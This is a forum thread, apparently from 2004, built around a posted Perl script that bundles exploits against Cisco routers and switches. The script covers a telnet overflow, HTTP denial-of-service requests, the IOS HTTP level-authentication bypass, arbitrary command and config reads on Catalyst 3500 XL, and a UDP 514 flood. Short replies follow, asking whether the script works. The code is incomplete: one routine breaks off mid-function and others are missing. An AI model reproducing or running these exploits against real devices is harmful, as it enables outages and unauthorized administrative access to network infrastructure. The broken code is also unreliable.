sub usage { printf "\nUsage :\n"; printf "perl cge.pl -h <host> -v <vulnerability number>\n\n"; printf "Vulnerabilities list :\n"; printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\n"; printf "[2] - Cisco IOS Router Denial of Service Vulnerability\n"; printf "[3] - Cisco IOS HTTP Auth Vulnerability\n"; printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\n"; printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n"; printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerability\n"; printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n"; printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n"; printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\n\n"; exit(1); }
sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability { my $serv = $host; my $dch = "?????????????????a~ %%%%%XX%%%%%"; my $num = 30000; my $string .= $dch x $num; my $shc="\015\012";
my $sockd = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $serv, PeerPort => "(23)", ) || die("No telnet server detected on $serv ...\n\n");
$sockd->autoflush(1); print $sockd "$string". $shc; while (<$sockd>){ print } print("\nPacket sent ...\n"); sleep(1); print("Now checking server's status ...\n"); sleep(2);
my $sockd2 = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $serv, PeerPort => "(23)", ) || die("Vulnerability successful exploited. Target server is down ...\n\n");
print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); exit(1); }
sub cisco2 # Cisco IOS Router Denial of Service Vulnerability { my $serv = $host;
my $sockd = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd){die "No http server detected on $serv ...\n\n"}; $sockd->autoflush(1); print $sockd "GET /\%\% HTTP/1.0\n\n"; -close $sockd; print "Packet sent ...\n"; sleep(1); print("Now checking server's status ...\n"); sleep(2);
my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd){die "Vulnerability successful exploited. Target server is down ...\n\n"};
print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); exit(1); }
sub cisco3 # Cisco IOS HTTP Auth Vulnerability { my $serv= $host; my $n=16; my $port=80; my $target = inet_aton($serv); my $fg = 0;
LAB: while ($n<100) { my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n"); foreach $line (@results){ $line=~ tr/A-Z/a-z/; if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;} if ($line =~ /http\/1\.0 200 ok/) {$fg=0;} }
if ($fg==1) { sleep(2); print "Vulnerability unsuccessful exploited with $n ...\n\n\r"; } else { sleep(2); print "Vulnerability successful exploited with $n ...\n\n\r"; last LAB; }
$n++;
sub exploit { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Unable to initialize socket ...\n\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("No http server detected on $serv ...\n\n"); } } } exit(1); }
sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability { my $serv = $host; my $n = 16;
while ($n <100) { exploit1("GET /level/$n/exec/- HTTP/1.0\n\n"); $wr =~ s/\n//g; if ($wr =~ /200 ok/) { while(1) { print "\nVulnerability could be successful exploited. Please choose a type of attack :\n"; print "[1] Banner change\n"; print "[2] List vty 0 4 acl info\n"; print "[3] Other\n"; print "Enter a valid option [ 1 - 2 - 3 ] : "; $vuln = <STDIN>; chomp($vuln);
sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability { my $serv = $host; my $port = 80; my $k = "";
print "Enter a file to read [ /show/config/cr set as default ] : "; $k = <STDIN>; chomp ($k); if ($k eq "") {$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";} else {$vuln = "GET /exec$k HTTP/1.0\n\n";}
my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No http server detected on $serv ...\n\n";
print "Packet sent ...\n"; print $sockd "$vuln"; sleep(2); print "\nServer response :\n\n"; while (<$sockd>){print} close($sockd); exit(1); }
sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability { my $serv = $host; my $port = 80; my $vuln = "GET /error?/ HTTP/1.0\n\n";
my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No http server detected on $serv ...\n\n";
print "Packet sent ...\n"; print $sockd "$vuln"; sleep(2); print "\nServer response :\n\n"; while (<$sockd>){print} close($sockd); exit(1); }
sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability { my $ip = $host; my $port = "514"; my $ports = ""; my $size = ""; my $i = "";
socket(SS, PF_INET, SOCK_DGRAM, 17); my $iaddr = inet_aton("$ip");
for ($i=0; $i<10000; $i++) {send(SS, 0, $size, sockaddr_in($port, $iaddr));}
printf "\nPackets sent ...\n"; sleep(2); printf "Please enter a server's open port : "; $ports = <STDIN>; chomp $ports; printf "\nNow checking server status ...\n"; sleep(2);
socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n"; my $dest = sockaddr_in ($ports, inet_aton($ip)); connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n";
printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n"; exit(1); }
wizy
Mar 25 2004, 07:16 PM
note: this is not my code, all credit to The BlackAngels
H4xorHunt3r
Apr 1 2004, 02:25 PM
wizy, or anyone else for that matter, have you tried running the Black Angels' perl scripts to see if they work correctly? I am very interested in knowing if they work, but do not have a Cisco IOS box to run it against in a lab enviornment. Cheers,
tolf
Apr 2 2004, 12:48 AM
QUOTE (H4xorHunt3r @ Apr 1 2004, 02:25 PM)
wizy, or anyone else for that matter, have you tried running the Black Angels' perl scripts to see if they work correctly? I am very interested in knowing if they work, but do not have a Cisco IOS box to run it against in a lab enviornment. Cheers,
Alot of these vulnerabilities have been around for a while and work fine...
All black angles did was put it into a complete menu driven script... But good work nevertheless.
hidden
Apr 4 2004, 10:51 AM
someone did arrive to compile it ????
BlaStA
Apr 4 2004, 10:57 AM
QUOTE (wizy @ Mar 25 2004, 08:15 PM)
#!/usr/bin/perl
What do you think this means? YES, IT'S PERL! Is perl compiled? NO, IT'S INTERPRETED!
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
